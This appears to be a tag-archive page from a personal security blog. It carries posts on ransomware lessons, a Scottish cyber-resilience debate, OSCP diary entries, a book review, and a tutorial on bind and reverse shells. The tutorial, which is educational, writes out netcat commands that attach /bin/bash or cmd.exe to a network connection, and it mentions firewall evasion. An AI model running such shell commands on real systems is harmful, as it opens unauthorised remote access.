Tag Archives: Network Security

WannaCrypt and Petra: Lessons Learned

Lots of talk about the lessons that should be learned from the recent spate of ransomware out breaks, namely WannaCrypt and Petya.
I think one of the main lessons learned is that the security services shouldn’t be hoarding zero days and tools to exploit them, (especially) if they can’t properly secure them.

The thing to remember, however, is that WannaCrypt and Petya both had patches available (probably because Microsoft where tipped off in advanced) before they hit and both also took advantage of poor configuration.

Additionally, many organisations that were hit hard could have avoided some (possibly all) pain if they had standard belts and braces security practices in place.

The main lesson organisations should learn is that they should get the basics right.

For example:

Vulnerability Management

Conduct regular vulnerability scanning, understand the security posture of all assets and what vulnerabilities are present, what threats are related to these vulnerabilities, and what risk they pose to the IT estate and the business it serves.
This includes both missing patches (i.e. MS17-010) and poor configuration (i.e., having SMBv1 enabled).

This should all be supported by proper processes that allow for ongoing discovery, remediation of vulnerabilities (either via action or risk acceptance) and confirming remediation.

Ideally, all risks across the entire IT estate should be known about and managed.

Additionally, roles and responsibilities should be assigned to ensure that all of the above is done correctly. This includes security managers, security analysts, vulnerability managers IT technicians etc.

Patch Management

Ensure that patches are deployed in a timely manner. This doesn’t just mean pushing the latest Patch Tuesday patches. This also includes understanding what software you have in your IT estate and having a full inventory of assets to make sure everything is patched.

Removable Media Controls

Ensure removable media is limited to devices that are sanctioned only. Ideally, I would blacklist all removable media and whitelist anything that you approve. (This is just my view, however)

Malware Prevention

Ensure you have some kind of AV on all end points, at least the classic heuristics and definition based AV (although there are more advanced solutions available), and make sure it is up to date and working.

Disaster Recovery

Ensure you have backups, including off-site, off-line backups of critical data.

Incident Management

Ensure you have a plan to react to a major security incident; ensure you have the right people in the right places supported by the right processes.
Control User Privilege

This one goes without saying really: make sure that all users have the least amount of privilege possible. This should be supported by processes to ensure that this is audited regularly.

User Education and Engagement

Ensure all staff understand the security policy of your organisation. Conduct exercises such as phishing campaigns to test your users and provide training to allow them to understand the risks involved and be better prepared to spot pushing emails, pushing web sites, social engendering etc. (Again, this is just a view, some people may suggest that security shouldn’t be a user problem; it should be an IT problem)

Good Network Security Hygiene

Have the correct access controls, know what is on your perimeter, ensure you have properly configured firewalls at all appropriate places in your network (with regular rule audits and reviews), have IDS/IPS where required and make sure that VLANS are properly setup with as much segmentation as is required. Ensure that all remote users can connect securely and that any devices they connect from have at least 1-to-1 patch levels as devices already on the network. Also, make sure that you have robust BYOD controls.

Scot Gov: Cyber Resilience Debate Analysis

Some analysis on the Scottish Government’s Deputy First Minister, John Swinney’s opening statement during the “Safe, Secure and Prosperous: Achieving a Cyber-resilient Scotland” debate last week.

John Swinney Scottish National Party

“Our focus in this afternoon’s debate recognises the urgency for everyone to secure their technology, data and networks from the many threats that we face, and proposes that citizens and organisations must become more resilient, aware of the risks, and able to respond and recover quickly from any kind of cyberattack.”

The debate appears to be in response to wannacrypt, it may have been planned in advance I’m not sure. Regardless good that cyber security is still very close to the top of the agenda for the Scottish Government.

Daniel Johnson Labour

“… our response is vital, but so is prevention. One of the key issues with the recent attack was … Windows XP … Does the Scottish Government have a target date for removing Windows XP from … across the Scottish Government?”

John Swinney Scottish National Party

“The key question that we have to address is how we establish and maintain the most rigorous level of security possible on all systems that are used. In certain circumstances, there may be an appropriate use for the systems to which Mr Johnson referred.
However, the crucial thing is that security arrangements must be in place to ensure that the necessary precautions are taken.”

Sounds like mitigation is king, makes sense given the circumstances. But I also think a plan to ensure that unsupported Operating Systems are replaced, a desktop replacement programme at the very least. NHS Scotland should act as single entity to leverage the best deal during the procurement process.

Would be interesting to see what legacy requirements are dependent on windows XP. I understand that some of the systems purchased by the NHS are long term investments and these systems may require the use of Windows XP, but I would hope that these considerations are taken into the account when making such purchases, would it be that hard/expensive to include clauses in contracts that require vendors to ensure that these systems are fully secure and supported throughout their entire lifecycle? How do other countries or private health care providers manage this? Is Linux a viable option in terms of procurement? Would this be any more secure anyway? What would the total cost of ownership be?

John Swinney Scottish National Party

“Any business that can successfully demonstrate that it has taken steps to protect its own and its customers’ data, as well as to respond to and bounce back from any cyberattack, is in a strong position to grow in the digital age. Organisations that can demonstrate their resilience to cybercrime can gain a competitive advantage and increased consumer confidence. Therefore, developing cyber-resilience as a core part of an organisation’s business strategy will ensure that the organisation continues to take full advantage of the internet age and to flourish into the bargain.”

Very high level, standard but sensible advice, echoing what we have seen from the UK government.

John Swinney Scottish National Party

“Social engineering is one of the simplest ways of overcoming our technical defences. We should not blame users. They are not the weakest link, as is often said; they are essential assets. Links and attachments are common in the workplace and that is why they are exploited. … Therefore, part of our response must be to get the basics of online security correct. That includes raising the knowledge and awareness of all our citizens about the risks and the steps that they can take to reduce them.”

Little bit of spin here. I think highlighting user education is right, would be interesting to see if there is some follow up to citizen awareness line at the end there. Some kind of government sponsored education campaign to inform users of the risk of phishing, vishing and all its variants would be helpful and quick win for everyone involved.

In saying this I also believe that businesses need to take responsibility and run their own education programs for their users. From personal experience I know user education lowers risk.

Dean Lockhart Conservative

“Does the cabinet secretary agree that additional availability of computing skills teaching at all school levels would help to address some of those issues?”

John Swinney Scottish National Party

“Obviously, computing science is an integral part of the curriculum, and it is part of some of the earliest stages of primary education. I have seen various coding initiatives in primary schools that have involved primary 3 and 4 pupils. I firmly support the importance of ensuring that young people are exposed at the earliest possible ages to computing education and that they are able to acquire the skills and attributes that are necessary for them to prosper.”

Some good initiatives here and the Scottish government have made great progress in this area, (if anything I think Mr Swinney underplayed some of the work being done.) There is always more that can be done however.

I gave a talk to some primary 3 and 4’s recently and most of the knowledge these kids had on cyber security focused around game hackers. One thing was undeniable however the kids were very enthusiastic, engaged and willing to learn.

I think having some cyber security on the curriculum for all students nationwide for kids as young as 7 or 8 would be a great way to capitalise on this enthusiasm, it could be used to educate kids about general dangers of being online at the same time.

There is a lot impressive progress with older kids and young adults, especially in the further and higher education space which has been supported by the Scottish Government. Only time will tell if it is enough.

John Swinney Scottish National Party

“The digital Scotland business excellence partnership has provided £400,000 to help businesses in Scotland to improve their cyber-resilience and work towards achieving the cyber essentials standard.”

Good to see the Scottish government through its weight behind this scheme. One of the things I like about this scheme is that it gives a target for some basic baseline security controls over a number of domains, as well as introducing of a form of compliance for organisations that may not have any compliance requirements. I think external audits of any kind are great for sharpening the mind and focusing attention.

John Swinney Scottish National Party

“The Government’s investment in the area is specifically to support a range of hardware and software measures to protect its information and communications technology systems, infrastructure and data; to improve its network monitoring capabilities; to boost staffing in the area, which is vital in order to have the skills available to handle the challenges; to establish and expand a cybersecurity operations centre; and for corporate education awareness and training across the board.”

I like the idea of continuous monitoring and SoC’s, they are definitely a good way to spot and prioritise cyber risks quickly. Although from my experience there is a big skills gap in this area, whether this is down to the explosion of prevalence in SoC’s or not I do not know.

SoC’s needs to be implemented correctly if they are to work, there is no point in having a SoC if it isn’t running at operational maturity, and getting to maturity can be a painful process.

Many vendors now offer SoC as a service which is a good way for private organisations to get access to a SoC’s capabilities without massive cost or having to endure the painful maturation process. I do not think this would be an option for the public sector however due to national security concerns. This could prove expensive, especially if a dedicated Scottish Government SoC was rolled out to all local government, schools, hospitals etc. I can see this one being fully outsourced. (Which to be fair is probably the best way to go about it.)

John Swinney Scottish National Party

“It is essential that, across a range of different areas—on learning and skills, on the role of the private sector, on compliance with the European Union general data protection regulation and on the securing of our critical infrastructure—we make cohesive and coherent efforts to ensure that we are equipped to meet the challenges.”

A wild GDPR reference appears. This is an area the government should be focusing on and along with ICO doing everything they can to help Scottish Businesses be ready for. With fines of up 4% of revenue there is a real chance that this could impact the Scottish Economy. It look like the Scottish Government is ready to do its bit.

Full debate can be viewd here: http://www.scottishparliament.tv/20170524_debates

OSCP Diary 3

I didn’t intend on taking so much time in between posts, but with work, Christmas and the OSCP I have been swamped!

So sitrep: Progress has been slow and steady, maybe a little slower than I would have liked…in fact definitely slower than I would have liked.

So my main issue has been myself.. I am arrogant, I procrastinate a lot and I am a weak!

So let me explain each in turn; I am arrogant. Coming into the OSCP, I was telling myself, how hard can this be, you’ve been in this game for a few years now, you have lots of Linux experience, you have used most and if not all of these tools before. This should be a formality.

Well it turns out it isn’t a formality, yes I have been in this game before, but never on the attacking side, sure I’ve done the vulnhub stuff, the uni classes and even a little bit of dabbling in the real world, but this is different, it isn’t just about knowing how to use the tools or following tutorials. This requires you to sit down and plan and conduct the tools like a conductor conducts an orchestra. This is about knowing what to use when, about what steps to take first, about developing a repeatable but dynamic process.

This is hard….way harder than it sounds, I think the only way to really learn this is via time, practice and effort.

While we are on the subject of effort, let’s move on to my next failing; procrastination. All too often have I got up and told myself today I will spend the entire day on this..and sometimes I do. But that also involves picking up my phone to check Facebook, stopping to make tea, going on youtube etc etc. This wastes lots of time. I need to stop this.

My next failing is weakness….I will admit it, I have had the “I can’t do this” moment(s), it has hit me and it has hit me hard.

I will be working on a box, I will be following an attack vector all is well, I’m in full on Neo from the matrix mode…then boom. Brickwall….I get stuck and I cannot get any further. This has happened to me a few times now.

But…a few days ago I hit a milestone, I pwned not 1..but 2 boxes. Sure they were exploiting the same vulnerability, but the joy of getting a shell on those boxes with a custom exploit was good!

I had my first “I CAN DO THIS!” moment, from these I have had a number of small victories, finding the odd thing here and there, I am beginning to feel like I am making progress.

Right that is enough for today, I’m not sure exactly when my next post will be but I will try make it sooner than this one took me!

OSCP Diary Day 2 and 3

I’m now on day 3 of 90 of the OSCP. How has progress been!?…well, steady.

Time has been tight, with work, family etc. It’s hard to set aside blocks of time to really sit down and concentrate. I have the luxury of being able to do a bit at work (cause my work is awesome!), but much of that is broken up in between work stuff (Which obviously takes priority) so I haven’t had a huge amount of time to just sit down and focus on working though the course work.

But steady progress is better than no progress… and today…*druuum roooollllll* I popped my first box. Although it was very…VERY low hanging fruit.

I have also made some great progress in regards to enumeration. So all in all, the last couple of days while not being perfect have been okay.

I will need to take a day off tomorrow as I am attending a Cyber Security Conference (Which I am really pumped up for), but I will be back in action on Friday
I’ve still not had that “I can’t do this moment”…but I haven’t tried hard enough yet. Friday I hope to have a few hours of time to dedicate to this, so maybe that moment will come then!

Meaningful time in labs: 9 hours.

OSCP Diary Day 1

Welcome to my OSCP diary, somewhere for me to brain dump my thoughts as I work my way through the Penetration Testing with Kali Linux (PWK) course and then take the Offensive Security Certified Professional (OSCP) Exam.

The PWK/OSCP are under strict NDA so I will not be going into details here, I will be very general and very vague. So if you are looking for PWK tutorials and howtos, then you have come to the wrong place.

After weeks of waiting I finally got my OSCP lab access last night at 0000 Hours, as the bell tolled midnight the email that I had not patiently waited for was finally delivered.

The plan was wait up until midnight, get the email download all the stuff that I needed to get onto the labs, all the course materials etc. etc. then go to bed get a solid 7 hours sleep and be ready to spend Sunday pwning n00bs and popping shells!

So that was the plan, the reality however was somewhat more chaotic. Like a schoolboy at Christmas I have been getting a lot little hyped up over the last few days counting down the minutes to 0000 on my lab access day, thus I was already a little sleep deprived when I waited up to receive my email.

So the email comes in and I feel the rush of adrenalin surge though me (well about as much as a rush as you can get from receiving an email after a 20 hour day), and off I go dutifully downloading all the stuff I needed.

So I finished getting all the stuff and headed off to bed and sleep for a solid 7 hours….no I’m just kidding. I thought to myself, “ahh well I may as well configure everything just now so I’m ready to go in the morning.”, so off I go configuring all the things, getting everything just so.

It is now around 0100 everything is downloaded, everything is configured, all I need to do now is get some shut eye.

“But maybe I should just have a wee tincy wincy look at what I have in store for me”….so I open the course materials, pop on the forums, check out the IRC…it’s now 0200.

My mindset has now changed, I’m now thinking “well I’ve went this far I may as well get on the labs and have a look”…3 hours later it 0500 and I’ve just sat up all night, excited scanning all the things!
At this stage tiredness gets the better of me and I decide to call it a night (well technically morning).

So to bed I go 3 and bit hours later I’m awake again it is now 0830 and I am feeling compelled to get back in the labs. So to the labs I go…now it may be the sleep deprivation, it may be the excessive amount espressos I’ve consumed or it could be a combination of both, but I could not focus on any one thing. I must have wasted hours jumping around from one thing to another. I went from going rouge and jumping ahead of the game hitting random boxes to deciding to slow down and methodically just work my way though things from beginning to end.

In the end it now approaching 1800 I need to get things ready for the day job tomorrow (who I owe a big thank you to for putting me though the OSCP!), and I need to step away for a bit let everything from last 18 hours sink in.

The two take aways from day 1 are:

1: Sleep (it is a requirement unfortunately)
2: Plan ahead and prepare your day. (this will save a lot of time later on!)

Now roll on day 2 (of 90).

Meaningful time in labs: 6 Hours

What are Bind and Reverse Shells?

I wanted to make a very short and simple post about shells…when starting out in pen testing you will hear a lot of chatter about shells, so this post hopes to clear up some of the terminology involved.

Now I guess that since you are reading this you’re already familiar with what a shell is. *If not have a look here* What I wanted to cover was bind shells and reverse shells…and what exactly the differences are. To do this we are going to run through a short exercise using the classic Netcat.

What you will need for this exercise are two machines on the same network segment, both with a copy of Netcat on them. They can be any combination of Linux or Windows (or something more exotic and/or $expensive = Macs).

For this exercise I spun up a couple of VMs, one Kali Linux box and one Windows Server 2012 box.

Netcat is included on Linux distros that come with Nmap as standard or can be downloaded from most standard Linux repos, for Windows you can pull the nc.exe from the web

Netcat is a simple (but powerful) command line tool that has become something of legend in the networking and security worlds, put simply Netcat can throw up listening TCP and UDP ports very quickly, it can unsurprisingly enough also connect to TCP and UDP ports just as easily.

Netcat comes into its own however with its power to read and write bits to and from these connections, this allows Netcat to perform a vast array of functions. For more have a look at the Netcat main page.

It is Netcat’s ability to read and write to layer 4 connections and streams that allows us to create the shells. This is done by redirecting the 3 shell I/O streams, stdin, stdout and stderr over the layer 4 connections.

The nuances of what is a bind shell and what is a reverse shell are dictated by the client server paradigm.

Okay, demo time, so either play along at home or just put your feet up and watch. *Read*

Our two boxes are Wendy the Windows box ( and Lynn the Linux box (

So we will start with a bind shell, this is really quite simple, a bind shell is called a bind shell because it binds a shell to a listening TCP port. For example;

Lynn the Linux box wants to bind its bash shall to a listening port, the following command can be used to do this;

Lynn nc -nlvp nc 9874 -e /bin/bash

Let’s break that command down, nc is the Netcat binary, -nlvp: numeric (no dns names), listening, verbose and port, with 9874 as the option, this being the port that will be set to listen. The -e points to a file to be executed after the connection is established, in this instance that file is /bin/bash, our shell.

Now when a connection is established on Lynn (, the bash shell will fire up and proceed to redirect it’s I/O streams across the connection. So if we connect to it from another box we can access Lynn’s shell, lets do this from Wendy;

Wendy nc -nv 9874

And that’s it…it’s that simple, we now have control over an instance of bash running on Lynn from Wendy. From Wendy we can issue commands and see the output of them.


The reason this is known as a bind shell is because the shell is bound to the listening port, but what if we want to access Wendy’s Shell from Lynn while still maintaining the same Client/Server paradigm?

Well thankfully this is just as easy, what we are about to do is known as a reverse shell. First, as before we will set up a listening TCP port on Lynn, this time however we are not going to bind a shell to the listening port.

Lynn nc -nlvp nc 9874

Now on Wendy we are going to connect to Lynn’s listening port of 9874, this time however we are going to attach the Wendy’s cmd.exe shell to the client end of the conversation.

Wendy nc -nv 9874 -e cmd.exe

We now have access to Wendy’s shell on Lynn. There are a number of different reasons why we might choose between bind and reverse shells, the main one as far as pen testing goes is basic evasion, connections could be allowed in one direction but denied in the other, if Wendy and Lynn were on two separate network segments with a firewall in the middle for example, the firewall may allow outbound connections, but deny inbound connections.

In the example above Lynn acted as the server and Wendy as the client, but this paradigm can be reversed with the exact same results for both bind and reverse shells, simply setting Wendy to listen instead of Lynn

Answering the question, no one asked…

I have to be honest I do love myself a pocket reference guide. Even with the internet’s vast resources there is something about holding an old school, analogue, physical copy of a book that is pleasing in a way that searching the internet just isn’t.

The strange thing is that despite their name, I’ve never actually carried one of these books around in my pocket, this lead me to assume that they didn’t fit in real pockets….

Well as it turns out, predictably and obviously I was wrong….


Book Review: Hacked Again

Scott N. Schober’s Hacked Again has emblazoned across its cover ‘It can happen to anyone, even a cybersecurity expert.’ And so it begins, Scott is a cybersecurity expert and CEO of a hi-tech firm, in Hacked Again he takes us through his journey of being the victim of cyber crime, while along the way providing a plethora of expert and common sense advice on how to avoid finding yourself at the wrong end of cyber fraudsters.

Scott opens the book with an anecdote from his youth, opening his first bank account in a friendly local bank where people were on a first name basis, he describes the evolution of this bank and how through a series of mergers, acquisitions and takeovers it has become a modern day banking machine, impersonal and globalised. As the anecdote goes on Scott subtly drops little hints that will become relevant later.

This leads the reader seamlessly into how Scott first realised he had been hacked for the first time. One morning Scott noticed he had a number of suspicious transactions on his business account, after a little investigating it dawned on him…his account had been compromised. And so the motto on the cover proves true…‘It can happen to anyone, even a cybersecurity expert.’

As Scott looks into the compromise it begins to dawn on him, that perhaps it’s not a case of ‘it can happen to anyone even a cyber security expert’ and more a case of, ‘it can happen to anyone, especially a cybersecurity expert.’ While his business account was being investigated, Scott switched to his personal account, only to realise that was also being targeted. It was then Scott began to suspect he was being specifically targeted, that his bank credentials had been compromised and were being traded on the dark web by criminals who wanted to make an example out of the cyber security experts that make their life harder.

From here Scott describes yet another fraud his company was nearly the victim of. After receiving an order for high priced items to be sent by special delivery as soon as possible to an address in Indonesia, Scotts company dispatched the items, only to receive a call from an angry lawn mower repair company demanding to know why he had been charged for the aforementioned items that were currently winging their way to Southeast Asia.

Thanks to the timely phone call, Scott was able to put a halt to the order and recover the items. The lessons Scott learned? Well amongst other things, timely incident response is critical and if something seems to good to be true..it usually is.

Hacked Again then goes on to detail other cyber crimes involving identity theft, credit card fraud, social engineering as well as the tactics deployed by the attackers and the strategies to protect yourself from them. There are many themes that emerge as the book goes on such as who to trust, how to trust, defence in depth, password hygiene, internet browsing habits and the jarring reality of the divergence of feeling secure and actually being secure.

This book takes the reader on whirlwind tour of all manner of cyber crime, it covers malware from spyware to ransomware. Scott provides advice on how to avoid being compromised via spear phishing emails that have went from being very easy to spot with their broken English and low-res pictures to very convincing emails that look and feel the part. One of the golden nuggets buried in Hacked Again is that it not only tells you how to avoid being compromised but what to do if and when you are comprised.

The book continues to follow this blend of storytelling that is part anecdote, part ‘how to’ and part ‘how not to’. It moves swiftly and logically from one subject to the next. It is a book that does not linger on a subject long enough for it become boring or uninteresting. Instead the book flows and is a very easy to read, I was shocked when I first sat down to read Hacked Again only to realise two hours had passed in what seemed like the blink of an eye. Much of this is due to the graceful manner the author moves from one subject to the next.

The question I found myself asking when reading hacked again was ‘who is this aimed at?’, my conclusion was this is book is a must read for c-level management and medium to small business owners, as well as ICT Managers across the world. It gives an overview of the risks businesses face in today’s connected world, while providing tangible and relatable real world examples of these risks becoming real life problems.

But they are not the only people who should read this book, anyone with any kind of online presence could benefit from reading Hacked Again, that includes everyone from your grandparents to your computer science graduate buddies and yes even cyber security experts. Another group who will find this book of interest and perhaps not its obvious audience is anyone who fancies themselves as an expert in a particular field. In the latter stages of the book Scott discusses his experience as an media go to expert on cybersecuirty, this is one part of the book I found surprisingly insightful, if not entirely relevant

This books fits a niche, it is not a focused investigation into a specific topics like Brian Krebs Spam Nation, Misha Glenny’s Darkmarket or Kim Zettler’s Countdown to Zero Day, nor is it a technical tour de force like that found in a Bruce Schneier book. Hacked again just touches on those subjects, giving the reader awareness of them as examples of the darkness that is lurking out there. What this book is, is an exquisitely written warning, but not only a warning, it is a manual on what you can do to keep yourself and your business safe, and this is where its true value lies.

Hacked again is a veritable 101 the of risk of cybercrime and cyber security, an impeccable overview of the whos, the whats and the hows of information security, it gives this overview without ever slipping into hyperbolic hysteria in order to get its point across.

Scott’s manner of storytelling is seamless, he starts off on a thread and leads you down a path until its conclusion, all the while dropping bread crumbs of advice and the lessons he has learned along the way. It’s an effective blend of storytelling and educating, at no point do you ever feel condescended by the advice being dispensed. As a security researcher myself I know how easy it is to feel patronised when receiving security advice.

In the foreword for Hacked Again, radio host Jon Leiberman describes how Scott can translate complex technical details and tech talk into understandable information. This is true, Scott does know how to effectively demystify tech talk into non-intimidating, flowing and compelling storytelling. Hacked Again is the work of man who knows his subject and the work of man who has learned the lessons of what can happen when you are the victim of cybercrime, it is the work of man who wants to pass on those lessons to the reader and this is why it is a must read.

You can find Scott on Twitter @ScottBVS as well as following the Hacked Again Twitter account at @HackedAgainBook

About Scott Schober

Buy Hacked Again from Amazon UK

Buy Hacked Again from Amazon US

Get the audiobook from Audible UK

Get the audiobook from Audible US

Infamous IP Address Resurfaces

A couple of days ago researchers over at Sucuri posted a blog, detailing some investigative work on suspicious redirects which turned out to be the result of NameCheaps Free DNS service.

I won’t cover the detail of the blog (go read it, its a great piece of work) but one of the most surprising and interesting things (to me at least) uncovered was the resurrection of an IP related to the prehistoric and infamous conficker virus’s C2 domains.

So it just goes to show that I’m not the only person in security that like to pay homage to the past, even if I do it in a slightly less conspicuous fashion.